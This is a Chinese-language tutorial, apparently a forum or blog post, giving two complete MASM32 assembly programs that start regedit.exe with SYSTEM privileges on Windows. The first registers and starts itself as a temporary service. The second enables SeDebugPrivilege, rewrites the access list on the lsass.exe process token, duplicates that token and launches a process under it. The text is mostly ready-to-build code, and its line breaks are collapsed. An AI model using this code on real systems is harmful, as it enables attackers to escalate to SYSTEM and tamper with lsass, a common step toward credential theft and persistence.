1. 以服务方式运行因为以服务方式运行程序时,相当于运行程序的是系统进程,所以,被指定运行的程序自然而然的继承了系统进程的权限,也就是SYSTEM 权限。
;@echo off;goto make;===================================================================== ===============; 以SYSTEM 权限运行程序- GetSys1; 采用以服务方式运行的方法;===================================================================== ===============.386.model flat, stdcalloption casemap :noneinclude c:\masm32\include\windows.incinclude c:\masm32\include\kernel32.incinclude c:\masm32\include\advapi32.incinclude c:\masm32\include\masm32.incincludelib c:\masm32\lib\kernel32.libincludelib c:\masm32\lib\advapi32.libincludelib c:\masm32\lib\masm32.lib_ReLaunch protoCTXT MACRO textlocal lbl.constlbl db text,0.codeexitmENDM.codestart procLOCAL stStartupInfo : STARTUPINFOLOCAL procinfo : PROCESS_INFORMA TIONinvoke CreateMutex, NULL, TRUE, CTXT("GetSys1_Mutex")invoke GetLastError.if eax==ERROR_ALREADY_EXISTSinvoke RtlZeroMemory, addr stStartupInfo, sizeof stStartupInfo mov stStartupInfo.cb, sizeof stStartupInfoinvoke CreateProcess, 0, CTXT("regedit.exe"), 0, 0, 0, 0, 0, 0, addr stStartupInfo, addr procinfoinvoke CloseHandle, procinfo.hProcessinvoke CloseHandle, procinfo.hThread.elseinvoke _ReLaunch.endifinvoke ExitProcess, NULLstart endp_ReLaunch procLOCAL hSCManagerLOCAL hServiceLOCAL szName[MAX_PA TH] : byteinvoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE .if eax!=0mov hSCManager, eaxinvoke OpenService, hSCManager, CTXT("GetSys1Temp"), DELETE.if eax!=0push eaxinvoke DeleteService, eaxcall CloseServiceHandle.endifinvoke GetModuleFileName, NULL, addr szName, MAX_PA THinvoke CreateService, hSCManager, CTXT("GetSys1Temp"), CTXT("GetSys1 Temp Service"), \SERVICE_START + SERVICE_QUERY_STATUS + DELETE, \SERVICE_WIN32_OWN_PROCESS + SERVICE_INTERACTIVE_PROCESS, SERVICE_DEMAND_START, \SERVICE_ERROR_IGNORE, addr szName, NULL, NULL, NULL, NULL, NULL.if eax!=0mov hService, eaxinvoke StartService, hService, 0, NULLinvoke DeleteService, hServiceinvoke CloseServiceHandle, hService.endifinvoke CloseServiceHandle, hSCManager.endifret_ReLaunch endpend start:makeset path=%path%;c:\masm32\binset appname=GetSys1ml /nologo /c /coff %appname%.batlink /nologo /subsystem:windows %appname%.objdel %appname%.objecho.pauseGetSys1(第一次运行的这个进程GetSys1 我们称为A)开始运行时先创建一个互斥量,接着以服务的方式重新启动自己(又一次运行的进程GetSys1 我们称为B),重新运行后的 B 已经具有了SYSTEM 权限。
B 再通过CreateProcess 函数运行regedit.exe 程序,因为B 具有SYSTEM 权限,所以regedit.exe 从中继承了SYSTEM 权限。
运行完了regedit.exe 后B 结束运行,然后A 中的StartService 函数返回,A 结束运行。
就是因为StartService 函数不会直接返回,所以不能够直接通过服务的方式运行regedit.exe。
2. 添加ACL 的方法主要思想是调用CreateProcessAsUser 函数来运行程序,CreateProcessAsUser函数的第一个参数是特定用户的令牌,把这个参数设为具有SYSTEM 权限的令牌即可。
;@echo off;goto make;===================================================================== ===============; 以SYSTEM 权限运行程序- GetSys2; 采用添加ACL 的方法;===================================================================== ===============.386.model flat, stdcalloption casemap :noneinclude c:\masm32\include\windows.incinclude c:\masm32\include\kernel32.incinclude c:\masm32\include\advapi32.incinclude c:\masm32\include\accctrl.incinclude c:\masm32\include\masm32.incincludelib c:\masm32\lib\kernel32.libincludelib c:\masm32\lib\advapi32.libincludelib c:\masm32\lib\masm32.lib_EnablePrivilege proto WORD,WORD_GetPidFromProcName proto WORD_ModifySecurity proto WORD,WORDCTXT MACRO textlocal lbl.constlbl db text,0.codeexitmENDMACL STRUCTAclRevision BYTE ?Sbz1 BYTE ?AclSize WORD ?AceCount WORD ?Sbz2 WORD ?ACL ENDSPACL typedef PTR ACL SecurityImpersonation equ 2.codestart procLOCAL hProcLOCAL hToken, hNewTokenLOCAL stStartupInfo : STARTUPINFOLOCAL procinfo : PROCESS_INFORMA TIONsub eax, eaxmov hProc, eaxmov hToken, eaxmov hNewToken, eaxinvoke RtlZeroMemory, addr stStartupInfo, sizeof stStartupInfoinvoke RtlZeroMemory, addr procinfo, sizeof procinfoinvoke _EnablePrivilege, CTXT("SeDebugPrivilege"), TRUEinvoke _GetPidFromProcName, CTXT("lsass.exe")invoke OpenProcess, PROCESS_QUERY_INFORMATION, 0, eaxtest eax, eaxjz _exitmov hProc, eaxinvoke OpenProcessToken, hProc, READ_CONTROL+WRITE_DAC, addr hToken test eax, eaxjz _exitinvoke _ModifySecurity, hToken, TOKEN_ALL_ACCESStest eax, eaxjz _exitinvoke CloseHandle, hTokenmov hToken, 0invoke OpenProcessToken, hProc, TOKEN_ALL_ACCESS, addr hTokentest eax, eaxjz _exitinvoke DuplicateTokenEx, hToken, TOKEN_ALL_ACCESS, 0, SecurityImpersonation, TokenPrimary, addr hNewTokentest eax, eaxjz _exitinvoke ImpersonateLoggedOnUser, hNewTokentest eax, eaxjz _exitmov stStartupInfo.cb, sizeof stStartupInfoinvoke CreateProcessAsUser, hNewToken, 0, CTXT("regedit.exe"), 0, 0, 0, 0, 0, 0, addr stStartupInfo, addr procinfotest eax, eaxjz _exitinvoke CloseHandle, procinfo.hProcessinvoke CloseHandle, procinfo.hThread_exit:.if hProcinvoke CloseHandle, hProc.endif.if hTokeninvoke CloseHandle, hToken.endif.if hNewTokeninvoke CloseHandle, hNewToken.endifinvoke ExitProcess, NULLstart endp_ModifySecurity proc uses ebx esi edi, hToken:DWORD, dwAccess:DWORD LOCAL pSD, pAbsSDLOCAL dwSDLengthLOCAL bDaclPresent, bDaclDefaultedLOCAL pAcl : PACLLOCAL pNewAcl : PACLLOCAL szName[1024] : BYTELOCAL ea : EXPLICIT_ACCESSLOCAL pSacl, pOwner, pPrimaryGroupLOCAL dwAclSize, dwSaclSize, dwOwnerSize, dwPrimaryGroupLOCAL bSuccesssub eax, eaxmov pSD, eaxmov pAbsSD, eaxmov dwSDLength, eaxmov bDaclPresent, eaxmov bDaclDefaulted, eaxmov pAcl, eaxmov pNewAcl, eaxmov pSacl, eaxmov pOwner, eaxmov pPrimaryGroup, eaxmov dwAclSize, eaxmov dwSaclSize, eaxmov dwOwnerSize, eaxmov dwPrimaryGroup, eaxmov bSuccess, eaxinvoke GetKernelObjectSecurity, hToken, DACL_SECURITY_INFORMATION, pSD, 0, addr dwSDLengthinvoke LocalAlloc, LPTR, dwSDLengthtest eax, eaxjz _exitmov pSD, eaxinvoke GetKernelObjectSecurity, hToken, DACL_SECURITY_INFORMATION, pSD, dwSDLength, addr dwSDLengthinvoke GetSecurityDescriptorDacl, pSD, addr bDaclPresent, addr pAcl, addr bDaclDefaultedmov eax, sizeof szNamepush eaxinvoke GetUserName, addr szName, esppop eaxinvoke BuildExplicitAccessWithName, addr ea, addr szName, dwAccess, GRANT_ACCESS, FALSEinvoke SetEntriesInAcl, 1, addr ea, pAcl, addr pNewAclcmp eax, ERROR_SUCCESSjne _exitinvoke LocalFree, pAclmov pAcl, 0invoke MakeAbsoluteSD, pSD, pAbsSD, addr dwSDLength, pAcl, addr dwAclSize, pSacl, addr dwSaclSize, \pOwner, addr dwOwnerSize, pPrimaryGroup, addr dwPrimaryGroupinvoke LocalAlloc, LPTR, dwSDLengthtest eax, eaxjz _exitmov pAbsSD, eaxinvoke LocalAlloc, LPTR, dwAclSizetest eax, eaxjz _exitmov pAcl, eaxinvoke LocalAlloc, LPTR, dwSaclSizetest eax, eaxjz _exitmov pSacl, eaxinvoke LocalAlloc, LPTR, dwOwnerSizetest eax, eaxjz _exitmov pOwner, eaxinvoke LocalAlloc, LPTR, dwPrimaryGrouptest eax, eaxjz _exitmov pPrimaryGroup, eaxinvoke MakeAbsoluteSD, pSD, pAbsSD, addr dwSDLength, pAcl, addr dwAclSize, pSacl, addr dwSaclSize, \pOwner, addr dwOwnerSize, pPrimaryGroup, addr dwPrimaryGroup invoke SetSecurityDescriptorDacl, pAbsSD, bDaclPresent, pNewAcl, bDaclDefaultedinvoke SetKernelObjectSecurity, hToken, DACL_SECURITY_INFORMA TION, pAbsSD mov bSuccess, 1_exit:.if pSDinvoke LocalFree, pSD.endif.if pAclinvoke LocalFree, pAcl.endif.if pNewAclinvoke LocalFree, pNewAcl.endif.if pAbsSDinvoke LocalFree, pAbsSD.endif.if pSaclinvoke LocalFree, pSacl.endif.if pOwnerinvoke LocalFree, pOwner.endif.if pPrimaryGroupinvoke LocalFree, pPrimaryGroup .endifmov eax, bSuccessret_ModifySecurity endp_EnablePrivilege proc szPriv:DWORD, bFlags:DWORDLOCAL hTokenLOCAL tkp : TOKEN_PRIVILEGESinvoke GetCurrentProcessmov edx, eaxinvoke OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hTokeninvoke LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luidmov tkp.PrivilegeCount, 1xor eax, eax.if bFlagsmov eax, SE_PRIVILEGE_ENABLED.endifmov tkp.Privileges.Attributes, eaxinvoke AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0push eaxinvoke CloseHandle, hTokenpop eaxret_EnablePrivilege endp_GetPidFromProcName proc lpProcName:DWORDLOCAL stProcess : PROCESSENTRY32LOCAL hSnapshotLOCAL dwProcessIDmov dwProcessID, 0invoke RtlZeroMemory, addr stProcess, sizeof stProcessmov stProcess.dwSize, sizeof stProcessinvoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0 mov hSnapshot, eaxinvoke Process32First, hSnapshot, addr stProcess.while eaxinvoke lstrcmpi, lpProcName, addr stProcess.szExeFile.if eax==0mov eax, stProcess.th32ProcessIDmov dwProcessID, eax.break.endifinvoke Process32Next, hSnapshot, addr stProcess.endwinvoke CloseHandle, hSnapshotmov eax, dwProcessIDret_GetPidFromProcName endpend start:makeset path=%path%;c:\masm32\binset appname=GetSys2ml /nologo /c /coff %appname%.batlink /nologo /subsystem:windows %appname%.objdel %appname%.objecho.pauseGetSys2 取得lsass.exe 进程的令牌,缺省情况下操作这个令牌的权限很小,所以需要先取得操作这个令牌的所有权限。